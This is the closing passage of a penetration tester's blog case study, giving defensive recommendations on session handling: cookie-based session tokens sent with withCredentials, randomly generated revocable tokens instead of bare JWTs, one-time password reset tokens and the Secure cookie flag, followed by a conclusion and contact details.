Then if the request to REST API, made from javascript, is done with property withCredentials : true, the cookie with the session token will be automatically attached and securely sent to the backend server in a Cookie: header. Furthermore, cookie will only be attached if the request is made from https://app.accounting.com origin URL, protecting the users from possible CSRF attacks. There is no need to use custom headers for transporting session tokens and it is always better to use standard cookies, which receive better protection from modern web browsers.

2. Authorize users with randomly generated session tokens.

Using JSON Web Token as session tokens is rather secure if you use a strong secret key, but keep in mind that if your encryption key ever gets leaked or stolen and the attackers get a hold of it, they will be able to forge their own session tokens, allowing them to impersonate every registered user in the application.

It is imperative for every web application to use randomly generated session tokens that can be invalidated at any time. Sessions should be invalidated every time the user signs in, signs out or resets their password. Such session handling will also protect users from session fixation attacks.

In the pentested application, the additional session token could be embedded inside the JWT itself, inside the data section, like so:

{"tokenType":"AUTHORIZE","exp":1489663403,"id":77,"token":"79c7d0c479011ca769be91c049dedae8b6e0cdec6c3ec7f652804fe446094b26"}

It is important to note here, that the application also used JWT as a verification token inside the reset password link. Password resetting functionality should always be handled using one-time tokens. Once the password is reset, the reset token should be invalidated to prevent anyone from using it again. Using JWT makes it possible to re-use the token for as long as the expiration timestamp allows.

3. Use Secure flag for all cookies.

If the application is served only via HTTPS (and it should), setting a secure flag on cookies, will allow them to be sent only over secure HTTPS connection. That way, the application's session tokens will never be sent in plain-text, making them protected against man-in-the-middle attacks.

Conclusion

I hope you found this little case study useful. Although I'm aware I haven't exhausted the subject of improper session handling or launching XSS attacks, I wanted to present a sample real-life scenario of a web application penetration test. If you are a web developer, you may look differently, from now on, into implementation of session tokens and maybe you will put more effort into filtering those nasty HTML tags in the output of user supplied data.

If you are looking for a web application penetration tester or reverse engineer, I will be more than happy to hear about your project and how I can help you.

I am always available on Twitter @mrgretzky or directly via email [email protected].

Have a nice day and see you in my next post!

❌